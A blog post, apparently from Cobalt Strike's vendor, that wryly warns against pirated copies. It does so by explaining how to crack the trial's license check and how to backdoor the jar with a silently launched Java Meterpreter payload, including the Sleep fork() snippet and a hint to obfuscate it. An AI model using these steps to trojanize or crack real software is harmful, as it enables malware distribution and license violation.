Strategic Cyber LLC

How to crack Cobalt Strike AND backdoor it

You know you’ve made it (somewhere?) as a software developer, when people pirate your stuff.  From various searches, I see that several “cracked” versions of the Cobalt Strike trial exist. Since there’s interest in pirating Cobalt Strike, I’d like to speculate about which steps I would take to crack the Cobalt Strike trial and add a backdoor to it, prior to distribution on an unofficial site.

At its core, Cobalt Strike is a Java application. Java applications are packaged as .jar files. Jar files are complex. So complex, a major conference carried a talk on how to reverse engineer them in early 2012. I’ll skip the reference to this talk and point in the right direction: use unzip. The unzip tool uses a sophisticated algorithm based on LZ77 and Huffman coding. After unzip, all of the Cobalt Strike files will spill out:

Java applications consist of .class files. These files do not represent the socio-economic status of the code. Rather, they are the compiled form of several .java files. Cobalt Strike is a strange beast of an application though. There are also several .sl files. These are Sleep files. Sleep is a simple scripting language I’ve worked on since 2002. I write in Sleep because I’m very efficient with it.

For the aspiring cracker, Sleep is a welcome sight. Its files do not ship in a compiled form. They’re available as plaintext inside of the application archive. A plaintext file requires a special tool, called a text editor, to change its content. I recommend notepad.exe or pico. Linux hackers may use WINE to run notepad.exe. Type:

wine notepad.exe

Knowing how to navigate code and find things is a key skill for an aspiring cracker. My favorite way to search through source code is grep.

grep -r "some string" .

To crack Cobalt Strike, look for a file that manages license information. The trial expired message is a good string to look for. One change, in one line of code, will make a trial that will never expire. Remember–this is a violation of the license agreement.

Why stop at removing the trial restriction? For those with the skills and insights in this post, it’s a few steps to crack Cobalt Strike and use it to distribute malware.

Here’s how to do it with Cobalt Strike:

1. Define a listener for Java Meterpreter. Go to Cobalt Strike -> Listeners and press Add. Listeners are Cobalt Strike’s concept of persistent Metasploit Framework handlers. Each time Cobalt Strike is run, the defined listeners automatically start.

2. Export a Java Meterpreter package. Go to Attacks -> Packages -> Java Application. Choose a listener and press Generate. Cobalt Strike makes it easy to export artifacts to use in social engineering attacks.

3. Use unzip to extract the Java Meterpreter package into a folder.

4. cd to this folder and delete META-INF/MANIFEST.MF

5. Copy all of the Java Meterpreter files, unchanged, into the folder where the extracted Cobalt Strike lives.

6. Add this code to the bottom of a .sl file:

fork({
   [metasploit.Payload main: $null];
});

This Sleep code will silently run Java Meterpreter in its own thread. Consult the Sleep manual for different ways to obfuscate this code.

7. The opposite of unzip is zip. Use this program to package the extracted Cobalt Strike files into one zip file. The cracked trial filename should end in .jar.

Congratulations, a backdoored version of Cobalt Strike is now ready for distribution.

Cracked trials of Cobalt Strike trials are available on many websites. I have never downloaded one and I do not intend to. The process I went through in this post isn’t the only way to add a backdoor to an unofficial copy of Cobalt Strike.

There is a way to get a clean copy of Cobalt Strike though. Download a 21 day trial through the official website.